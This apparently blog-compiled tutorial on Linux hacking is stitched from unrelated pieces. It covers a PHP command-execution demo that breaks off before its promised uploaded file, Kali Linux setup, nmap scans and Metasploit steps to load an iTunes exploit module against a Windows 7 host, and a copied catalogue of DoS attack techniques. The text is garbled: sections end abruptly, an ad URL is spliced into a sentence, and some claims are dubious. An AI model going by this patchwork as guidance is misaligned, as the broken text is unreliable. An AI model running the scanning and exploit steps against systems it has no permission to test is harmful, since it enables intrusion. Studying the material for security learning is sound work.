Linux is the most widely used server operating system, especially for web servers. It is open source; this means anybody can have access to the source code. This makes it less secure compared to other operating systems as attackers can study the source code to find vulnerabilities. Linux Hacking is about exploiting these vulnerabilities to gain unauthorized access to a system.
In this article, we will introduce you to what Linux is, its security vulnerabilities and the counter measures you can put in place.
Quick Note on Linux
Linux is an open source operating system. There are many distributions of Linux-based operating systems such as Redhat, Fedora, and Ubuntu, etc. Unlike other operating system, Linux is less secure when it comes to security. This is because the source code is available freely, so it is easy to study it for vulnerabilities and exploit them compared to other operating systems that are not open source. Linux can be used as a server, desktop, tablet, or mobile device operating system.
Linux programs can be operated using either GUI or commands. The commands are more effective and efficient compared to using the GUI. For this reason, it helps to know Linux basic commands.
NMap. This tool can be used to monitor hosts that are running on the server and the services that they are utilizing. It can also be used to scan for ports. It can be found at https://nmap.org/
SARA – SARA is the acronym for Security Auditor’s Research Assistant. As the name implies, this tool can be used to audit networks against threats such as SQL Injection, XSS etc. it can be found at http://www-arc.com/sara/sara.html
The above list is not exhaustive; it gives you an idea of the tools available for hacking Linux systems.
How to prevent Linux hacks
Linux Hacking takes advantage of the vulnerabilities in the operating system. An organization can adopt the following policy to protect itself against such attacks.
Patch management– patches fix bugs that attackers exploit to compromise a system. A good patch management policy will ensure that you constantly apply relevant patches to your system.
Proper OS configuration– other exploits take advantage of the weaknesses in the configuration of the server. Inactive user names and daemons should be disabled. Default settings such as common passwords to application, default user names and some port numbers should be changed.
Intrusion Detection System– such tools can be used to detect unauthorized access to the system. Some tools have the ability to detect and prevent such attacks.
Hacking Activity: Hack a Ubuntu Linux System using PHP
In this practical scenario, we will provide you with basic information on how you can use PHP to compromise a Linux. We are not going to target any victim. If you want to try it out, you can install LAMPP on your local machine.
PHP comes with two functions that can be used to execute Linux commands. It has exec() and shell_exec() functions. The function exec() returns the last line of the command output while the shell_exec() returns the whole result of the command as a string.
For demonstration purposes, let’s assume the attacker managers to upload the following file on a web server.
Kali Linux is a Security Distribution of Linux specifically designed for digital forensics and penetration testing. It was developed by Mati Aharoni and Devon Kearns of Offensive Security through the rewrite of BackTrack. BackTrack was their previous information security Operating System. The first iteration of Kali Linux was Kali 1.0.0 was introduced in March 2013. Offensive Security currently funds and supports Kalin Linux. If you were to visit Kali’s website today (www.kali.org), you would see a large banner stating, “Our Most Advanced Penetration Testing Distribution, Ever.” A very bold statement that ironically has yet to be disproven.
Kali Linux has over 600 preinstalled penetration-testing applications to discover. Each program with its unique flexibility and use case. Kali Linux does excellent job separating these useful utilities into the following categories:
Information Gathering
Vulnerability Analysis
Wireless Attacks
Web Applications
Exploitation Tools
Stress Testing
Forensics Tools
Sniffing & Spoofing
Password Attacks
Maintaining Access
Reverse Engineering
Reporting Tools
Hardware Hacking
Who uses Kali Linux and Why?
Kali Linux is truly a unique operating system, as its one of the few platforms openly used by both good guys and bad guys. Security Administrators, and Black Hat Hackers both use this operating system extensively. One to detect and prevent security breaches, and the other to identify and possibly exploit security breaches. The number of tools configured and preinstalled on the operating system, make Kali Linux the Swiss Army knife in any security professionals toolbox.
Professionals that use Kali Linux
Security Administrators – Security Administrators are responsible for safeguarding their institution’s information and data. They use Kali Linux to review their environment(s) and ensure there are no easily discoverable vulnerabilities.
Network Administrators – Network Administrators are responsible for maintaining an efficient and secure network. They use Kali Linux to audit their network. For example, Kali Linux has the ability to detect rogue access points.
Network Architects – Network Architects, are responsible for designing secure network environments. They utilize Kali Linux to audit their initial designs and ensure nothing was overlooked or misconfigured.
Pen Testers – Pen Testers, utilize Kali Linux to audit environments and perform reconnaissance on corporate environments which they have been hired to review.
CISO – CISO or Chief Information Security Officers, use Kali Linux to internally audit their environment and discover if any new applications or rouge configurations have been put in place.
Forensic Engineers – Kali Linux posses a “Forensic Mode”, which allows a Forensic Engineer to perform data discovery and recovery in some instances.
White Hat Hackers – White Hat Hackers, similar to Pen Testers use Kali Linux to audit and discover vulnerabilities which may be present in an environment.
Black Hat Hackers – Black Hat Hackers, utilize Kali Linux to discover and exploit vulnerabilities. Kali Linux also has numerous social engineer applications, which can be utilized by a Black Hat Hacker to compromise an organization or individual.
Grey Hat Hackers – Grey Hat Hackers, lie in between White Hat and Black Hat Hackers. They will utilize Kali Linux in the same methods as the two listed above.
Computer Enthusiast – Computer Enthusiast is a pretty generic term, but anyone interested in learning more about networking or computers, in general, can use Kali Linux to learn more about Information Technology, networking, and common vulnerabilities.
Kali Linux Installation Methods
Kali Linux can be installed using the following methods:
Ways to Run Kali Linux:
Directly on a PC, Laptop – Utilizing a Kali ISO image, Kali Linux can be installed directly onto a PC or Laptop. This method is best if you have a spare PC and are familiar with Kali Linux. Also, if you plan or doing any access point testing, installing Kali Linux directly onto Wi-Fi enabled laptop is recommended.
Virtualized (VMware, Hyper-V, Oracle VirtualBox, Citrix) – Kali Linux supports most known hypervisors and can be easily into the most popular ones. Pre-configured images are available for download from www.kali.org, or an ISO can be used to install the operating system into the preferred hypervisor manually.
Cloud (Amazon AWS, Microsoft Azure) – Given the popularity of Kali Linux, both AWS and Azure provide images for Kali Linux.
USB Boot Disc – Utilizing Kali Linux’s ISO, a boot disc can be created to either run Kali Linux on a machine without actually installing it or for Forensic purposes.
Windows 10 (App) – Kali Linux can now natively run on Windows 10, via the Command Line. Not all features work yet as this is still in beta mode.
Mac (Dual or Single boot) – Kali Linux can be installed on Mac, as a secondary operating system or as the primary. Parallels or Mac’s boot functionality can be utilized to configure this setup.
Install Kali Linux using Virtual Box
The easiest method and arguably the most widely used is installing Kali Linux and running it from Oracle’s VirtualBox.
This method allows you to continue to use your existing hardware while experimenting with the featured enriched Kali Linux in a completely isolated environment. Best of all everything is free. Both Kali Linux and Oracle VirtualBox are free to use. This tutorial assumes you have already installed Oracle’s VirtualBox on your system and have enabled 64-bit Virtualization via the Bios.
This will download an OVA image, which can be imported into VirtualBox
Step 2) Open the Oracle VirtualBox Application, and from the File, Menu select Import Appliance
File Menu -> Import Appliance
Step 3) On the following screen “Appliance to Import” Browse to the location of the downloaded OVA file and click Open
Step 4) Once you click Open, you will be taken back to the “Appliance to Import” simply click Next
Step 5) The following screen “Appliance Settings” displays a summary of the systems settings, leaving the default settings is fine. As shown in the screenshot below, make a note of where the Virtual Machine is located and then click Import.
Step 6) VirtualBox will now Import the Kali Linux OVA appliance. This process could take anywhere from 5 to 10 minutes to complete.
Step 7) Congratulations, Kali Linux has been successfully installed on VirtualBox. You should now see the Kali Linux VM in the VirtualBox Console. Next, we’ll take a look at Kali Linux and some initial steps to perform.
Step 8) Click on the Kali Linux VM within the VirtualBox Dashboard and click Start, this will boot up the Kali Linux Operating System.
Step 9) On the login screen, enter “Root” as the username and click Next.
Step 10) As mentioned earlier, enter “toor” as the password and click SignIn.
You will now be present with the Kali Linux GUI Desktop. Congratulations you have successfully logged into Kali Linux.
Applications Tab – Provides a Graphical Dropdown List of all the applications and tools pre-installed on Kali Linux. Reviewing the Applications Tab is a great way to become familiar with the featured enriched Kali Linux Operating System. Two applications we’ll discuss in this tutorial are Nmap and Metasploit. The applications are placed into different categories which makes searching for an application much easier.
Accessing Applications
Step 1) Click on Applications Tab
Step 2) Browse to the particular category you’re interested in exploring
Step 3) Click on the Application you would like to start.
Places Tab – Similar to any other GUI Operating System, such as Windows or Mac, easy access to your Folders, Pictures and My Documents is an essential component. Places on Kali Linux provides that accessibility that is vital to any Operating System. By default, the Places menu has the following tabs, Home, Desktop, Documents, Downloads, Music, Pictures, Videos, Computer and Browse Network.
Accessing Places
Step 1) Click on the Places Tab
Step 2) Select the location you would like to access.
Kali Linux Dock – Similar to Apple Mac’s Dock or Microsoft Windows Task Bar, the Kali Linux Dock provides quick access to frequently used / favorite applications. Applications can be added or removed easily.
To Remove an Item from the Dock
Step 1) Right-Click on the Dock Item
Step 2) Select Remove From Favorites
To Add Item to Dock
Adding an item to the Dock is very similar to removing an item from the Dockhttps://d88a3f2d8b033e4056c74fbbe8624a13.safeframe.googlesyndication.com/safeframe/1-0-37/html/container.html
Step 1) Click on the Show Applications button at the bottom of the Dock
Step 2) Right Click on Application
Step 3) Select Add to Favorites
Once completed the item will be displayed within the Dock
Kali Linux has many other unique features, which makes this Operating System the primary choice by Security Engineers and Hackers alike. Unfortunately, covering them all is not possible within this tutorial; however, you should feel free to explore the different buttons displayed on the desktop.
What is Nmap?
Network Mapper, better known as Nmap for short is a free, open-source utility used for network discovery and vulnerability scanning. Security professionals use Nmap to discover devices running in their environments. Nmap also can reveal the services, and ports each host is serving, exposing a potential security risk. At the most basic level, consider Nmap, ping on steroids. The more advanced your technical skills evolve the more usefulness you’ll find from Nmap
Nmap offers the flexibility to monitor a single host or a vast network consisting of hundreds if not thousands of devices and subnets. The flexibility Nmap offers has evolved over the years, but at its core, it’s a port-scanning tool, which gathers information by sending raw packets to a host system. Nmap then listens for responses and determines if a port is open, closed or filtered.
The first scan you should be familiar with is the basic Nmap scan that scans the first 1000 TCP ports. If it discovers a port listening it will display the port as open, closed, or filtered. Filtered meaning a firewall is most likely in place modifying the traffic on that particular port. Below is a list of Nmap commands which can be used to run the default scan.
To run a basic Nmap scan in Kali Linux, follow the steps below. With Nmap as depicted above, you have the ability to scan a single IP, a DNS name, a range of IP addresses, Subnets, and even scan from text files. For this example, we will scan the localhost IP address.
Step 1) From the Dock menu, click on the second tab which is the Terminal
Step 2) The Terminal window should open, enter the command ifconfig, this command will return the local IP address of your Kali Linux system. In this example, the local IP address is 10.0.2.15
Step 3) Make a note of the local IP Address
Step 4) In the same terminal window, enter nmap 10.0.2.15, this will scan the first 1000 ports on the localhost. Considering this is the base install no ports should be open.
Step 5) Review results
By default, nmap only scans the first 1000 ports. If you needed to scan the complete 65535 ports, you would simply modify the above command to include -p-.
Nmap 10.0.2.15 -p-
Nmap OS Scan
Another basic but useful feature of nmap is the ability to detect the OS of the host system. Kali Linux by default is secure, so for this example, the host system, which Oracle’s VirtualBox is installed on, will be used as an example. The host system is a Windows 10 Surface. The host system’s IP address is 10.28.2.26.
In the Terminal window enter the following nmap command:
nmap 10.28.2.26 – A
Review results
Adding -A tells nmap to not only perform a port scan but also try to detect the Operating System.
Nmap is a vital utility in any Security Professional toolbox. Use the command nmap -h to explore more options and commands on Nmap.
What is Metasploit?
The Metasploit Framework is an open source project that provides a public resource for researching vulnerabilities and developing code that allows security professionals the ability to infiltrate their own network and identify security risk and vulnerabilities. Metasploit was recently purchased by Rapid 7 (https://www.metasploit.com). However, the community edition of Metasploit is still available on Kali Linux. Metasploit is by far the world’s most used Penetration utility.
It is important that you are careful when using Metasploit because scanning a network or environment that is not yours could be considered illegal in some instances. In this tutorial, we’ll show you how to start Metasploit and run a basic scan on Kali Linux. Metasploit is considered an advance utility and will require some time to become adept, but once familiar with the application it will be an invaluable resource.
Metasploit and Nmap
Within Metasploit, we can actually utilize Nmap. In this case, you’ll learn how to scan your local VirtualBox subnet from Metasploit using the Nmap utility we just learned about.
Step 1) On the Applications Tab, scroll down to 08-Exploitation Tools and then select Metasploit
Step 2) A terminal box will open, with MSF in the dialog, this is Metasploit
Step 3) Enter the following command
db_nmap -V -sV 10.0.2.15/24
(be sure to replace 10.0.2.15 with your local IP address)
Here:
db_ stands for database
-V Stands for verbose mode
-sV stands for service version detection
Metasploit Exploit Utility
Metasploit very robust with its features and flexibility. One common use for Metasploit is the Exploitation of Vulnerabilities. Below we’ll go through the steps of reviewing some exploits and trying to exploit a Windows 7 Machine.
Step 1) Assuming Metasploit is still open enter Hosts -R in the terminal window. This adds the hosts recently discovered to Metasploit database.
Step 2) Enter “show exploits“, this command will provide a comprehensive look at all the exploits available to Metasploit.
Step 3) Now, try to narrow down the list with this command: search name: Windows 7, this command searches the exploits which specifically include windows 7, for the purpose of this example we will try to exploit a Windows 7 Machine. Depending on your environment, you will have to change the search parameters to meet your criteria. For example, if you have Mac or another Linux machine, you will have to change the search parameter to match that machine type.
Step 4) For the purposes of this tutorial we will use an Apple Itunes vulnerability discovered in the list. To utilize the exploit, we must enter the complete path which is displayed in the list: use exploit/windows/browse/apple_itunes_playlist
Step 5) If the exploit is successful the command prompt will change to display the exploit name followed by > as depicted in the below screenshot.
Step 6) Enter show options to review what options are available to the exploit. Each exploit will, of course, have different options.
Summary
In sum, Kali Linux is an amazing operating system that is widely used by various professionals from Security Administrators, to Black Hat Hackers. Given its robust utilities, stability, and ease of use, it’s an operating system everyone in the IT industry and computer enthusiast should be familiar with. Utilizing just the two applications discussed in this tutorial will significantly aid a firm in securing their Information Technology infrastructure. Both Nmap and Metasploit are available on other platforms, but their ease of use and pre-installed configuration on Kali Linux makes Kali the operating system of choice when evaluating and testing the security of a network. As stated previously, be careful using the Kali Linux, as it should only be used in network environments which you control and or have permission to test. As some utilities, may actually cause damage or loss of data.
In computing, a denial-of-service attack (DoS attack) is a cyber-attack in which the perpetrator seeks to make a machine or network resource unavailable to its intended users by temporarily or indefinitely disrupting services of a host connected to the Internet. Denial of service is typically accomplished by flooding the targeted machine or resource with superfluous requests in an attempt to overload systems and prevent some or all legitimate requests from being fulfilled.
In a distributed denial-of-service attack (DDoS attack), the incoming traffic flooding the victim originates from many different sources. This effectively makes it impossible to stop the attack simply by blocking a single source.
A DoS or DDoS attack is analogous to a group of people crowding the entry door of a shop, making it hard for legitimate customers to enter, thus disrupting trade.
Criminal perpetrators of DoS attacks often target sites or services hosted on high-profile web servers such as banks or credit card payment gateways. Revenge, blackmail and can motivate these attacks.
Attack techniques
Attack tools
In cases such as MyDoom and Slowloris the tools are embedded in malware and launch their attacks without the knowledge of the system owner. Stacheldraht is a classic example of a DDoS tool. It uses a layered structure where the attacker uses a client program to connect to handlers which are compromised systems that issue commands to the zombie agents which in turn facilitate the DDoS attack. Agents are compromised via the handlers by the attacker using automated routines to exploit vulnerabilities in programs that accept remote connections running on the targeted remote hosts. Each handler can control up to a thousand agents.
Application-layer attacks
Application-layer attacks employ DoS-causing exploits and can cause server-running software to fill the disk space or consume all available memory or CPU time. Attacks may use specific packet types or connection requests to saturate finite resources by, for example, occupying the maximum number of open connections or filling the victim’s disk space with logs. An attacker with shell-level access to a victim’s computer may slow it until it is unusable or crash it by using a fork bomb. Another kind of application-level DoS attack is XDoS (or XML DoS) which can be controlled by modern web application firewalls (WAFs).
Degradation-of-service attacks
Pulsing zombies are compromised computers that are directed to launch intermittent and short-lived floodings of victim websites with the intent of merely slowing it rather than crashing it. This type of attack, referred to as degradation-of-service, can be more difficult to detect and can disrupt and hamper connection to websites for prolonged periods of time, potentially causing more overall disruption than a denial-of-service attack. Exposure of degradation-of-service attacks is complicated further by the matter of discerning whether the server is really being attacked or is experincing higher than normal legitimate traffic loads.
Denial-of-service Level II
The goal of DoS L2 (possibly DDoS) attack is to cause a launching of a defense mechanism which blocks the network segment from which the attack originated. In case of distributed attack or IP header modification (that depends on the kind of security behavior) it will fully block the attacked network from the Internet, but without system crash.
Distributed DoS attack
A distributed denial-of-service (DDoS) attack occurs when multiple systems flood the bandwidth or resources of a targeted system, usually one or more web servers. Such an attack is often the result of multiple compromised systems (for example, a botnet) flooding the targeted system with traffic. A botnet is a network of zombie computers programmed to receive commands without the owners’ knowledge. When a server is overloaded with connections, new connections can no longer be accepted. The major advantages to an attacker of using a distributed denial-of-service attack are that multiple machines can generate more attack traffic than one machine, multiple attack machines are harder to turn off than one attack machine, and that the behavior of each attack machine can be stealthier, making it harder to track and shut down. These attacker advantages cause challenges for defense mechanisms. For example, merely purchasing more incoming bandwidth than the current volume of the attack might not help, because the attacker might be able to simply add more attack machines. This, after all, will end up completely crashing a website for periods of time.
DDoS extortion
In 2015, DDoS botnets such as DD4BC grew in prominence, taking aim at financial institutions. Cyber-extortionists typically begin with a low-level attack and a warning that a larger attack will be carried out if a ransom is not paid in Bitcoin. Security experts recommend targeted websites to not pay the ransom. The attackers tend to get into an extended extortion scheme once they recognize that the target is ready to pay.
HTTP slow POST DoS attack
First discovered in 2009, the HTTP slow POST attack sends a complete, legitimate HTTP POST header, which includes a ‘Content-Length’ field to specify the size of the message body to follow. However, the attacker then proceeds to send the actual message body at an extremely slow rate. Due to the entire message being correct and complete, the target server will attempt to obey the ‘Content-Length’ field in the header, and wait for the entire body of the message to be transmitted, which can take a very long time. The attacker establishes hundreds or even thousands of such connections until all resources for incoming connections on the server (the victim) are used up, hence making any further (including legitimate) connections impossible until all data has been sent. It is notable that unlike many other (D)DoS attacks, which try to subdue the server by overloading its network or CPU, an HTTP slow POST attack targets the logical resources of the victim, which means the victim would still have enough network bandwidth and processing power to operate. Further combined with the fact that will, by default, accept requests up to 2GB in size, this attack can be particularly powerful. HTTP slow POST attacks are difficult to differentiate from legitimate connections and are therefore able to bypass some protection systems. OWASP, an open source web application security project, released a tool to test the security of servers against this type of attacks.
Challenge Collapsar (CC) attack
A Challenge Collapsar (CC) attack is an attack that standard HTTP requests are sent to a targeted web server frequently, in which the Uniform Resource Identifiers (URIs) require complicated time-consuming algorithms or database operations, in order to exhaust the resources of the targeted web server.
In 2004, a Chinese hacker nicknamed KiKi invented a hacking tool to send these kinds of requests to attack a NSFOCUS firewall named “Collapsar”, and thus the hacking tool was known as “Challenge Collapsar”, or CC for short. Consequently, this type of attack got the name “CC attack”.
Internet Control Message Protocol (ICMP) flood
A smurf attack relies on misconfigured network devices that allow packets to be sent to all computer hosts on a particular network via the broadcast address of the network, rather than a specific machine. The attacker will send large numbers of IP packets with the source address faked to appear to be the address of the victim. Most devices on a network will, by default, respond to this by sending a reply to the source IP address. If the number of machines on the network that receive and respond to these packets is very large, the victim’s computer will be flooded with traffic. This overloads the victim computer and can even make it unusable during such attack.
Ping flood is based on sending the victim an overwhelming number of ping packets, usually using the “ping” command from Unix-like hosts (the -t flag on Windows systems is much less capable of overwhelming a target, also the -l (size) flag does not allow sent packet size greater than 65500 in Windows). It is very simple to launch, the primary requirement being access to greater bandwidth than the victim.
Ping of death is based on sending the victim a malformed ping packet, which will lead to a system crash on a vulnerable system.
The BlackNurse attack is an example of an attack taking advantage of the required Destination Port Unreachable ICMP packets.
Nuke
A Nuke is an old denial-of-service attack against computer networks consisting of fragmented or otherwise invalid ICMP packets sent to the target, achieved by using a modified ping utility to repeatedly send this corrupt data, thus slowing down the affected computer until it comes to a complete stop.[52]
A specific example of a nuke attack that gained some prominence is the WinNuke, which exploited the vulnerability in the NetBIOS handler in Windows 95. A string of out-of-band data was sent to TCP port 139 of the victim’s machine, causing it to lock up and display a Blue Screen of Death (BSOD).
Peer-to-peer attacks
Attackers have found a way to exploit a number of bugs in peer-to-peer servers to initiate DDoS attacks. The most aggressive of these peer-to-peer-DDoS attacks exploits DC++. With peer-to-peer there is no botnet and the attacker does not have to communicate with the clients it subverts. Instead, the attacker acts as a “puppet master,” instructing clients of large peer-to-peer file sharing hubs to disconnect from their peer-to-peer network and to connect to the victim’s website instead.
Permanent denial-of-service attacks
Permanent denial-of-service (PDoS), also known loosely as phlashing, is an attack that damages a system so badly that it requires replacement or reinstallation of hardware. Unlike the distributed denial-of-service attack, a PDoS attack exploits security flaws which allow remote administration on the management interfaces of the victim’s hardware, such as routers, printers, or other networking hardware. The attacker uses these vulnerabilities to replace a device’s firmware with a modified, corrupt, or defective firmware image—a process which when done legitimately is known as flashing. This therefore “bricks” the device, rendering it unusable for its original purpose until it can be repaired or replaced.
The PDoS is a pure hardware targeted attack which can be much faster and requires fewer resources than using a botnet or a root/vserver in a DDoS attack. Because of these features, and the potential and high probability of security exploits on Network Enabled Embedded Devices (NEEDs), this technique has come to the attention of numerous hacking communities. BrickerBot, a piece of malware that targeted IoT devices, used PDoS attacks to disable its targets.
PhlashDance is a tool created by Rich Smith (an employee of Hewlett-Packard’s Systems Security Lab) used to detect and demonstrate PDoS vulnerabilities at the 2008 EUSecWest Applied Security Conference in London.
Reflected / spoofed attack
A distributed denial-of-service attack may involve sending forged requests of some type to a very large number of computers that will reply to the requests. Using Internet Protocol address spoofing, the source address is set to that of the targeted victim, which means all the replies will go to (and flood) the target. (This reflected attack form is sometimes called a “DRDOS”.)
ICMP Echo Request attacks (Smurf attack) can be considered one form of reflected attack, as the flooding host(s) send Echo Requests to the broadcast addresses of mis-configured networks, thereby enticing hosts to send Echo Reply packets to the victim. Some early DDoS programs implemented a distributed form of this attack.
Mirai botnet
This attack works by using a worm to infect hundreds of thousands of IoT devices across the internet. The worm propagates through networks and systems taking control of poorly protected IoT devices such as thermostats, Wi-Fi enabled clocks and washing machines.W the device becomes enslaved usually the owner or user will have no immediate indication. The IoT device itself is not the direct target of the attack, it is used as a part of a larger attack. These newly enslaved devices are called slaves or bots. Once the hacker has acquired the desired number of bots, they instruct the bots to try to contact an ISP. In October 2016, a Mirai botnet attacked Dyn which is the ISP for sites such as Twitter, Netflix, etc. Assoon as this occurred, these websites were all unreachable for several hours. This type of attack is not physically damaging, but it will certainly be costly for any large internet companies that get attacked.
R-U-Dead-Yet? (RUDY)
RUDY attack targets web applications by starvation of available sessions on the web server. Much like Slowloris, RUDY keeps sessions at halt using never-ending POST transmissions and sending an arbitrarily large content-length header value.
SACK Panic
Manipulating maximum segment size and selective acknowledgement (SACK) it may be used by a remote peer to cause a denial of service by an integer overflow in the Linux kernel, causing even a Kernel panic. Jonathan Looney discovered CVE-2019-11477, CVE-2019-11478, CVE-2019-11479 on June 17, 2019.
Shrew attack
The shrew attack is a denial-of-service attack on the Transmission Control Protocol where the attacker employs man-in-the-middle techniques. It uses short synchronized bursts of traffic to disrupt TCP connections on the same link, by exploiting a weakness in TCP’s re-transmission timeout mechanism.[73]
Slow Read attack
A slow read attack sends legitimate application layer requests, but reads responses very slowly, thus trying to exhaust the server’s connection pool. It is achieved by advertising a very small number for the TCP Receive Window size, and at the same time emptying clients’ TCP receive buffer slowly, which causes a very low data flow rate.
A sophisticated low-bandwidth DDoS attack is a form of DoS that uses less traffic and increases their effectiveness by aiming at a weak point in the victim’s system design, i.e., the attacker sends traffic consisting of complicated requests to the system. Essentially, a sophisticated DDoS attack is lower in cost due to its use of less traffic, is smaller in size making it more difficult to identify, and it has the ability to hurt systems which are protected by flow control mechanisms.
(S)SYN flood
A SYN flood occurs when a host sends a flood of TCP/SYN packets, often with a forged sender address. Each of these packets are handled like a connection request, causing the server to spawn a half-open connection, by sending back a TCP/SYN-ACK packet (Acknowledge), and waiting for a packet in response from the sender address (response to the ACK Packet). However, because the sender address is forged, the response never comes. These half-open connections saturate the number of available connections the server can make, keeping it from responding to legitimate requests until after the attack ends.
Teardrop attacks
A teardrop attack involves sending mangled IP fragments with overlapping, oversized payloads to the target machine. This can crash various operating systems because of a bug in their TCP/IP fragmentation re-assembly code. Windows 3.1x, Windows 95 and Windows NT operating systems, as well as versions of Linux prior to versions 2.0.32 and 2.1.63 are vulnerable to this attack.
(Although in September 2009, a vulnerability in Windows Vista was referred to as a “teardrop attack”, this targeted SMB2 which is a higher layer than the TCP packets that teardrop used).
One of the fields in an IP header is the “fragment offset” field, indicating the starting position, or offset, of the data contained in a fragmented packet relative to the data in the original packet. If the sum of the offset and size of one fragmented packet differs from that of the next fragmented packet, the packets overlap. When this happens, a server vulnerable to teardrop attacks is unable to reassemble the packets – resulting in a denial-of-service condition.
Telephony denial-of-service (TDoS)
Voice over IP has made abusive origination of large numbers of telephone voice calls inexpensive and readily automated while permitting call origins to be misrepresented through caller ID spoofing.
TTL expiry attack
It takes more router resources to drop a packet with a TTL value of 1 or less than it does to forward a packet with higher TTL value. When a packet is dropped due to TTL expiry, the router CPU must generate and send an ICMP time exceeded response. Generating many of these responses can overload the router’s CPU.
UPnP attack
This attack uses an existing vulnerability in Universal Plug and Play (UPnP) protocol to get around a considerable amount of the present defense methods and flood a target’s network and servers. The attack is based on a DNS amplification technique, but the attack mechanism is a UPnP router which forwards requests from one outer source to another disregarding UPnP behavior rules. Using the UPnP router returns the data on an unexpected UDP port from a bogus IP address, making it harder to take simple action to shut down the traffic flood. According to the Imperva researchers, the most effective way to stop this attack is for companies to lock down UPnP routers.
learngram.wordpress.com 
